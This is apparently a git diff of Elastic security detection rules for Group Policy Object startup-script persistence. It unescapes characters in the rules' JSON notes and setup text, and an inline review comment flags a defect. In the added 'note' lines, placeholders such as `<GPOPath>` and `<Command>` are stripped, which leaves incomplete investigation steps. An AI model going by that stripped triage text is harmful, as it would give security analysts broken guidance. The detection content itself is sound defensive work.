 "Elastic",
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_106.json b/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_106.json
index d547b4bd07a..64940e370e2 100644
--- a/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_106.json
@@ -57,7 +57,7 @@
 ],
 "risk_score": 47,
 "rule_id": "16a52c14-7883-47af-8745-9357803f0d4c",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_107.json b/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_107.json
index 7e837426e18..4d57ad66b92 100644
--- a/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_107.json
@@ -57,7 +57,7 @@
 ],
 "risk_score": 47,
 "rule_id": "16a52c14-7883-47af-8745-9357803f0d4c",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_108.json b/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_108.json
index 46e03586727..9cd9a6cde87 100644
--- a/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_108.json
@@ -57,7 +57,7 @@
 ],
 "risk_score": 47,
 "rule_id": "16a52c14-7883-47af-8745-9357803f0d4c",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -94,7 +94,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -116,7 +116,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_109.json b/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_109.json
index 72f5da56da7..ca915a0b33f 100644
--- a/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_109.json
+++ b/packages/security_detection_engine/kibana/security_rule/16a52c14-7883-47af-8745-9357803f0d4c_109.json
@@ -57,7 +57,7 @@
 ],
 "risk_score": 47,
 "rule_id": "16a52c14-7883-47af-8745-9357803f0d4c",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -94,7 +94,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
@@ -116,7 +116,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/16fac1a1-21ee-4ca6-b720-458e3855d046_105.json b/packages/security_detection_engine/kibana/security_rule/16fac1a1-21ee-4ca6-b720-458e3855d046_105.json
index 759cce7cb35..3fffe2d6108 100644
--- a/packages/security_detection_engine/kibana/security_rule/16fac1a1-21ee-4ca6-b720-458e3855d046_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/16fac1a1-21ee-4ca6-b720-458e3855d046_105.json 
@@ -15,7 +15,7 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "Startup/Logon Script added to Group Policy Object",
- "note": "## Triage and analysis\n\n### Investigating Scheduled Task Execution at Scale via GPO\n\nGroup Policy Objects (GPOs) can be used by attackers to instruct arbitrarily large groups of clients to execute specified commands at startup, logon, shutdown, and logoff. This is done by creating or modifying the `scripts.ini` or `psscripts.ini` files. The scripts are stored in the following paths:\n - `\u003cGPOPath\u003e\\Machine\\Scripts\\`\n - `\u003cGPOPath\u003e\\User\\Scripts\\`\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity is legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `\u003cCommand\u003e` and `\u003cArguments\u003e` XML tags for any potentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is legitimately authorized and executed under a change management process.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Scheduled Task Execution at Scale via GPO - 15a8ba77-1c13-4274-88fe-6bd14133861e\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scripts attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
+ "note": "## Triage and analysis\n\n### Investigating Scheduled Task Execution at Scale via GPO\n\nGroup Policy Objects (GPOs) can be used by attackers to instruct arbitrarily large groups of clients to execute specified commands at startup, logon, shutdown, and logoff. This is done by creating or modifying the `scripts.ini` or `psscripts.ini` files. The scripts are stored in the following paths:\n - `\\Machine\\Scripts\\`\n - `\\User\\Scripts\\`\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity is legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `` and `` XML tags for any potentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is legitimately authorized and executed under a change management process.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Scheduled Task Execution at Scale via GPO - 15a8ba77-1c13-4274-88fe-6bd14133861e\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scripts attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "host.os.type:windows and\n(\n event.code:5136 and winlog.event_data.AttributeLDAPDisplayName:(gPCMachineExtensionNames or gPCUserExtensionNames) and\n winlog.event_data.AttributeValue:(*42B5FAAE-6536-11D2-AE5A-0000F87571E3* and\n (*40B66650-4972-11D1-A7CA-0000F87571E3* or *40B6664F-4972-11D1-A7CA-0000F87571E3*))\n)\nor\n(\n event.code:5145 and winlog.event_data.ShareName:\\\\\\\\*\\\\SYSVOL and\n winlog.event_data.RelativeTargetName:(*\\\\scripts.ini or *\\\\psscripts.ini) and\n (message:WriteData or winlog.event_data.AccessList:*%%4417*)\n)\n",
 "references": [
 "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0025_windows_audit_directory_service_changes.md",
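Review bot: The new-side `note` in this hunk silently drops text: `<GPOPath>` is gone from both script paths and the `<Command>` / `<Arguments>` tag names are gone, so the rendered investigation guide now lists `\\Machine\\Scripts\\` with no GPO prefix and tells the analyst to "check the `` and `` XML tags". The old side carried these as `\u003cGPOPath\u003e`, `\u003cCommand\u003e` and `\u003cArguments\u003e`, so it looks like the step that unescaped `\u003c`/`\u003e` also stripped anything shaped like an HTML tag, whereas the `setup` strings in the same files kept `\u003c8.2` and `\u003e` as `<8.2` and `>`. The placeholders should be restored in the `+ "note"` line as `` - `<GPOPath>\\Machine\\Scripts\\` ``, `` - `<GPOPath>\\User\\Scripts\\` `` and `` check the `<Command>` and `<Arguments>` XML tags `` (a literal `<` needs no escaping in JSON), and the conversion tooling should be checked for tag stripping. The same loss appears in the `-15,7` hunks of `_106.json` and `_107.json` below, and presumably in the `_108.json` hunk that begins after this chunk.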
@@ -76,7 +76,7 @@
 ],
 "risk_score": 47,
 "rule_id": "16fac1a1-21ee-4ca6-b720-458e3855d046",
- "setup": "The 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nObject Access \u003e\nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```",
+ "setup": "The 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -89,7 +89,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/16fac1a1-21ee-4ca6-b720-458e3855d046_106.json b/packages/security_detection_engine/kibana/security_rule/16fac1a1-21ee-4ca6-b720-458e3855d046_106.json
index a1d64169c91..1c89a2bd6ca 100644
--- a/packages/security_detection_engine/kibana/security_rule/16fac1a1-21ee-4ca6-b720-458e3855d046_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/16fac1a1-21ee-4ca6-b720-458e3855d046_106.json
@@ -15,7 +15,7 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "Startup/Logon Script added to Group Policy Object",
- "note": "## Triage and analysis\n\n### Investigating Startup/Logon Script added to Group Policy Object\n\nGroup Policy Objects (GPOs) can be used by attackers to instruct arbitrarily large groups of clients to execute specified commands at startup, logon, shutdown, and logoff. This is done by creating or modifying the `scripts.ini` or `psscripts.ini` files. The scripts are stored in the following paths:\n - `\u003cGPOPath\u003e\\Machine\\Scripts\\`\n - `\u003cGPOPath\u003e\\User\\Scripts\\`\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity is legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `\u003cCommand\u003e` and `\u003cArguments\u003e` XML tags for any potentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is legitimately authorized and executed under a change management process.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Scheduled Task Execution at Scale via GPO - 15a8ba77-1c13-4274-88fe-6bd14133861e\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scripts attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
+ "note": "## Triage and analysis\n\n### Investigating Startup/Logon Script added to Group Policy Object\n\nGroup Policy Objects (GPOs) can be used by attackers to instruct arbitrarily large groups of clients to execute specified commands at startup, logon, shutdown, and logoff. This is done by creating or modifying the `scripts.ini` or `psscripts.ini` files. The scripts are stored in the following paths:\n - `\\Machine\\Scripts\\`\n - `\\User\\Scripts\\`\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity is legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `` and `` XML tags for any potentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is legitimately authorized and executed under a change management process.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Scheduled Task Execution at Scale via GPO - 15a8ba77-1c13-4274-88fe-6bd14133861e\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scripts attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "(\n event.code:5136 and winlog.event_data.AttributeLDAPDisplayName:(gPCMachineExtensionNames or gPCUserExtensionNames) and\n winlog.event_data.AttributeValue:(*42B5FAAE-6536-11D2-AE5A-0000F87571E3* and\n (*40B66650-4972-11D1-A7CA-0000F87571E3* or *40B6664F-4972-11D1-A7CA-0000F87571E3*))\n)\nor\n(\n event.code:5145 and winlog.event_data.ShareName:\\\\\\\\*\\\\SYSVOL and\n winlog.event_data.RelativeTargetName:(*\\\\scripts.ini or *\\\\psscripts.ini) and\n (message:WriteData or winlog.event_data.AccessList:*%%4417*)\n)\n",
 "references": [
 "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0025_windows_audit_directory_service_changes.md",
@@ -71,7 +71,7 @@
 ],
 "risk_score": 47,
 "rule_id": "16fac1a1-21ee-4ca6-b720-458e3855d046",
- "setup": "The 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nObject Access \u003e\nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```",
+ "setup": "The 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -84,7 +84,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/16fac1a1-21ee-4ca6-b720-458e3855d046_107.json b/packages/security_detection_engine/kibana/security_rule/16fac1a1-21ee-4ca6-b720-458e3855d046_107.json
index da08c4cdc8b..1edc1fbf929 100644
--- a/packages/security_detection_engine/kibana/security_rule/16fac1a1-21ee-4ca6-b720-458e3855d046_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/16fac1a1-21ee-4ca6-b720-458e3855d046_107.json
@@ -15,7 +15,7 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "Startup/Logon Script added to Group Policy Object",
- "note": "## Triage and analysis\n\n### Investigating Startup/Logon Script added to Group Policy Object\n\nGroup Policy Objects (GPOs) can be used by attackers to instruct arbitrarily large groups of clients to execute specified commands at startup, logon, shutdown, and logoff. This is done by creating or modifying the `scripts.ini` or `psscripts.ini` files. The scripts are stored in the following paths:\n - `\u003cGPOPath\u003e\\Machine\\Scripts\\`\n - `\u003cGPOPath\u003e\\User\\Scripts\\`\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity is legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `\u003cCommand\u003e` and `\u003cArguments\u003e` XML tags for any potentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is legitimately authorized and executed under a change management process.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Scheduled Task Execution at Scale via GPO - 15a8ba77-1c13-4274-88fe-6bd14133861e\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scripts attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
+ "note": "## Triage and analysis\n\n### Investigating Startup/Logon Script added to Group Policy Object\n\nGroup Policy Objects (GPOs) can be used by attackers to instruct arbitrarily large groups of clients to execute specified commands at startup, logon, shutdown, and logoff. This is done by creating or modifying the `scripts.ini` or `psscripts.ini` files. The scripts are stored in the following paths:\n - `\\Machine\\Scripts\\`\n - `\\User\\Scripts\\`\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity is legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `` and `` XML tags for any potentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is legitimately authorized and executed under a change management process.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Scheduled Task Execution at Scale via GPO - 15a8ba77-1c13-4274-88fe-6bd14133861e\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scripts attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "(\n event.code:5136 and winlog.event_data.AttributeLDAPDisplayName:(gPCMachineExtensionNames or gPCUserExtensionNames) and\n winlog.event_data.AttributeValue:(*42B5FAAE-6536-11D2-AE5A-0000F87571E3* and\n (*40B66650-4972-11D1-A7CA-0000F87571E3* or *40B6664F-4972-11D1-A7CA-0000F87571E3*))\n)\nor\n(\n event.code:5145 and winlog.event_data.ShareName:\\\\\\\\*\\\\SYSVOL and\n winlog.event_data.RelativeTargetName:(*\\\\scripts.ini or *\\\\psscripts.ini) and\n (message:WriteData or winlog.event_data.AccessList:*%%4417*)\n)\n",
 "references": [
 "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0025_windows_audit_directory_service_changes.md",
@@ -71,7 +71,7 @@
 ],
 "risk_score": 47,
 "rule_id": "16fac1a1-21ee-4ca6-b720-458e3855d046",
- "setup": "The 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nObject Access \u003e\nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success,Failure)\n```",
+ "setup": "The 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -84,7 +84,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/16fac1a1-21ee-4ca6-b720-458e3855d046_108.json b/packages/security_detection_engine/kibana/security_rule/16fac1a1-21ee-4ca6-b720-458e3855d046_108.json
index 09b12a31feb..0bf1ba336ef 100644
--- a/packages/security_detection_engine/kibana/security_rule/16fac1a1-21ee-4ca6-b720-458e3855d046_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/16fac1a1-21ee-4ca6-b720-458e3855d046_108.json
@@ -15,7 +15,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Startup/Logon Script added to Group Policy Object", - "note": "## Triage and analysis\n\n### Investigating Startup/Logon Script added to Group Policy Object\n\nGroup Policy Objects (GPOs) can be used by attackers to instruct arbitrarily large groups of clients to execute specified commands at startup, logon, shutdown, and logoff. This is done by creating or modifying the `scripts.ini` or `psscripts.ini` files. The scripts are stored in the following paths:\n - `\u003cGPOPath\u003e\\Machine\\Scripts\\`\n - `\u003cGPOPath\u003e\\User\\Scripts\\`\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity is legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `\u003cCommand\u003e` and `\u003cArguments\u003e` XML tags for any potentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is legitimately authorized and executed under a change management process.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Scheduled Task Execution at Scale via GPO - 15a8ba77-1c13-4274-88fe-6bd14133861e\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scripts attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the 
same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Startup/Logon Script added to Group Policy Object\n\nGroup Policy Objects (GPOs) can be used by attackers to instruct arbitrarily large groups of clients to execute specified commands at startup, logon, shutdown, and logoff. This is done by creating or modifying the `scripts.ini` or `psscripts.ini` files. The scripts are stored in the following paths:\n - `\\Machine\\Scripts\\`\n - `\\User\\Scripts\\`\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity is legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `` and `` XML tags for any potentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is legitimately authorized and executed under a change management process.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Scheduled Task Execution at Scale via GPO - 15a8ba77-1c13-4274-88fe-6bd14133861e\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scripts attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response 
data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "(\n event.code:5136 and winlog.event_data.AttributeLDAPDisplayName:(gPCMachineExtensionNames or gPCUserExtensionNames) and\n winlog.event_data.AttributeValue:(*42B5FAAE-6536-11D2-AE5A-0000F87571E3* and\n (*40B66650-4972-11D1-A7CA-0000F87571E3* or *40B6664F-4972-11D1-A7CA-0000F87571E3*))\n)\nor\n(\n event.code:5145 and winlog.event_data.ShareName:\\\\\\\\*\\\\SYSVOL and\n winlog.event_data.RelativeTargetName:(*\\\\scripts.ini or *\\\\psscripts.ini) and\n (message:WriteData or winlog.event_data.AccessList:*%%4417*)\n)\n", "references": [ "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0025_windows_audit_directory_service_changes.md", 
